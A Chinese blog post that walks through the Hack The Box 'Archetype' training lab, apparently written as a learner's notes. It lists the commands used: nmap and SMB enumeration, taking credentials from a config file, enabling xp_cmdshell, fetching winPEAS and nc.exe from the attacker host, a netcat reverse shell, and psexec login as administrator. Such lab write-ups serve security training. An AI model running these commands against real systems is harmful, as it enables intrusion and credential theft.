端口扫描

Copy
 
nmap -sV -sT 10.129.1.1

smbclint

Copy
smbclient -L 10.129.149.214

获取密码

Copy
smbclient  //10.129.149.214/backups
get prod.dtsConfig

连接数据库

Copy
sudo  impacket-mssqlclient sql_svc@10.129.149.214 -windows-auth

开启xp_cmdshell#

Copy
enable_xp_cmdshell
RECONFIGURE

上传nc和提权工具

Copy
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads;wget http://10.10.15.72/winPEAS.bat -outfile winPEAS.bat"
 
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads;wget http://10.10.15.72/nc.exe -outfile nc.exe"

开启nc监听 clinet运行nc

Copy
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads;.\nc.exe -e cmd.exe 10.10.15.72  4444"

获取user flag

运行./winPEAS.bat

掉线后重新连接，查询历史记录（等待SQL显示output）

账号密码登录

Copy
sudo psexec.py administrator@10.129.149.214

读取root.txt

posted @ 2023-08-11 01:03 Cohawa 阅读(52) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· THM-Skynet-Writeup

· 谢谢饲主了喵

· TIER 2: Archetype

· HTB-Archetype

· HTB靶场：Tactits & Archetype（利用SMB进行Windows提权&SQL Server getshell）

阅读排行：
· 全程不用写代码，我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了，比商业数据库还牛
· 记一次.NET内存居高不下排查解决与启示
· DeepSeek 开源周回顾「GitHub 热点速览」
· 白话解读 Dapr 1.15：你的「微服务管家」又秀新绝活了

公告

昵称： Cohawa
园龄： 2年4个月
粉丝： 0
关注： 7

+加关注

2025年3月

日

一

二

三

四

五

六

随笔分类

随笔档案

文章分类

文章档案

2023年8月(1)

HTB- Archetype

Cohawa